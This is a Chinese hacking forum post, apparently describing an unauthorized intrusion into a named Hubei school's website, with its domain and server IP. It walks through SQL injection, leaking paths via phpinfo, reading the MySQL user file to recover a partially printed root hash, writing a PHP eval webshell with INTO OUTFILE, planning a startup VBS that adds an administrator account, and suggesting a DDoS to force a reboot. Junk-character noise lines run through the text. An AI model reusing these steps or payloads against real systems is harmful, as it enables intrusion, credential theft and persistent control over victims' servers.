友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！

2 `, Z4 \: }8 N& m2 {& R' J

# s+ M, @! s) F9 |9 Y+ G" X$ q常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

+ {2 |7 F/ x6 F6 v  I0 K8 q1 L- }那么想可以直接写入shell ，getshell有几个条件：
, W# C% B$ E7 m+ ^

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
1./phpMyAdmin/index.php?lang[]=1  
" L+ S, r% F: R) a: `" J2./phpMyAdmin/phpinfo.php  
3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

, @; ?/ n* Z, z# x1 I均不行...........................
5 R0 l3 B6 E$ d" l
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
/ Q7 h9 y6 t6 C
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

; o. M9 B, c7 A) m( F  g敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

5 H0 H' g2 v/ P5 n想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
3 l) {. U- v! u% j
5 H1 k( v# j/ d5 ?( t; rhttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
) ]( k* \- m4 W" j( V5 c+ n; C, D5 i8 m
  J: h+ j7 g! m9 F/ k  U0 J自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
: g- O9 Z9 S; z- V: d
2 P: @& a* ~9 W8 D" r: g1 K% Z成功读到root密码：
" ?. }9 i, C3 E0 F
7 w! b: j  X6 z# y17---- r(0072)
' V/ O, i7 W: x5 g2 f/ L18---- o(006f)
$ h# k. ~( e1 ^0 H$ f) p19---- o(006f)
20---- t(0074)
0 L$ z5 K" R. N1 v1 S8 ]) E) e2 \21---- *(002a)
22---- 8(0038)
) Q( n. M) C2 w8 Y% K0 I8 o23---- 2(0032)
24---- E(0045)
( `7 M+ }4 {6 E, P: H25---- 1(0031)
26---- C(0043)
* M9 U$ E( J! ^' T# l4 |( R27---- 5(0035)
1 @5 m+ G$ t) y( B28---- 8(0038)
9 Y$ v% T4 }6 o! v* i; S1 D! v29---- 2(0032)
4 \) x4 W5 |8 M- {$ f0 Q) s30---- 8(0038)
31---- A(0041)
32---- 9(0039)
" J1 v& `  ^7 u- R, B33---- B(0042)
34---- 5(0035)
4 Z- R1 j" S  o35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
2 C( ], L4 V- {3 r7 q" Y- T7 l38---- 4(0034)
39---- 9(0039)
- _0 l  N- Z$ ^3 u6 W, z40---- 1(0031)
7 T/ T. ^7 K; ]4 R( H41---- 1(0031)
3 v& n: ~; g  F! k2 o42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
5 U# y6 T+ i: q2 |. G8 U45---- 9(0039)
46---- 8(0038)
+ V  o; Q# D1 x" ?( C  s47---- F(0046)
- Q8 G) Q, |3 M+ [* N  w# b8 L48---- F(0046)
49---- 4(0034)
- h2 Q5 E) `5 ?50---- F(0046)
" j7 ?: S9 x1 \! {8 `51---- 0(0030)
52---- 3(0033)
6 \3 X# J9 z+ M  F) e$ A" F53---- 2(0032)
" _3 L) L$ p" J$ H- E/ p54---- A(0041)
55---- 4(0034)
* j% r+ s3 X; f' H" ~- }7 N' b56---- A(0041)
- t- @! A% g4 ]9 U57---- B(0042)
& H5 _' O$ d2 Q5 m% `  T) N58---- *(0044)
4 M' H* `% |" O59---- *(0035)
% j4 a! s) l. H60---- *(0041)
61---- *0032)
, {; W: ^4 ~5 o' w, m8 \
6 U" m; e) f. t: d解密后成功登陆phpmyamin
                          
4 M" C% q1 G5 a! n# i+ I
) b- i! z) a! T$ ^- U                             
7 T' e& q5 ^* A* z5 R$ l: U3 ?
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

) o: [$ `; a$ N% `  l6 R7 M成功执行，拿下shell，菜刀连接：
# i' l: ~* H% f5 g
" `3 O4 l) w5 B: q3 u' f( k服务器不支持asp,aspx,php提权无果...................
+ Z( z3 T" z* x( E
+ s8 u5 B, v7 y2 O但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
1 D+ v1 u9 O. Q# q& Z( ^

服务器上已经有个隐藏帐号了

别名     administrators
* e$ u, n- g& d注释     管理员对计算机/域有不受限制的完全访问权

% s* I2 @# S& c( F  P

成员

4 R+ w5 |, q  f, G+ _

-------------------------------------------------------------------------------
admin
Administrator
" N! l: x! I) J. t2 Mslipper$
1 f. g- p) J. Gsqluser
3 F1 ~9 ~6 F' l9 y/ ^2 Q命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

: R+ q1 n& {( {ddos服务器重启，不然就只能坐等服务器重启了...............................

      

angel